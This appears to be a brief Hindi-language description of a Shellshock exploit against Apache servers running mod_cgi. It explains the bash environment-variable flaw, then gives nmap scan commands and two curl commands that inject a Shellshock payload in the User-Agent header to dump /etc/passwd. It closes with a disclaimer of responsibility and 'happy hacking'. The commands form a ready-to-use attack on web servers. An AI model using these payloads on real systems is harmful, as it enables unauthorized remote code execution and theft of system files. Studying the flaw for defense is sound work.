
"शेलशॉक" भेद्यता का शोषण। Apache में mod_cgi के साथ दूरस्थ कोड निष्पादन।
शेलशॉक प्रभावी रूप से BASH में एक रिमोट कमांड एक्सीक्यूशन भेद्यता है। यह स्क्रिप्ट mod_cgi सक्षम apache या समान वेब वातावरण में इस भेद्यता का शोषण करती है। यह भेद्यता पर्यावरण चर (environment variables) के हेरफेर में निहित है, जो डायनामिक नामित मान होते हैं जो कंप्यूटर पर प्रक्रियाओं के चलने के तरीके को प्रभावित करते हैं। हमलावर पर्यावरण चर में दुर्भावनापूर्ण कोड जोड़कर इसका शोषण कर सकते हैं, जो चर प्राप्त होने पर निष्पादित होता है। इससे हमलावर सिस्टम से समझौता कर सकते हैं।
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>
मैं इस उपकरण के कारण होने वाले किसी भी अवैध उपयोग या क्षति के लिए जिम्मेदार नहीं हूँ। यह मज़े के लिए लिखा गया था, बुराई के लिए नहीं, और हैकिंग और साइबर सुरक्षा के बारे में जागरूकता बढ़ाने के लिए है।
शुभ हैकिंग :)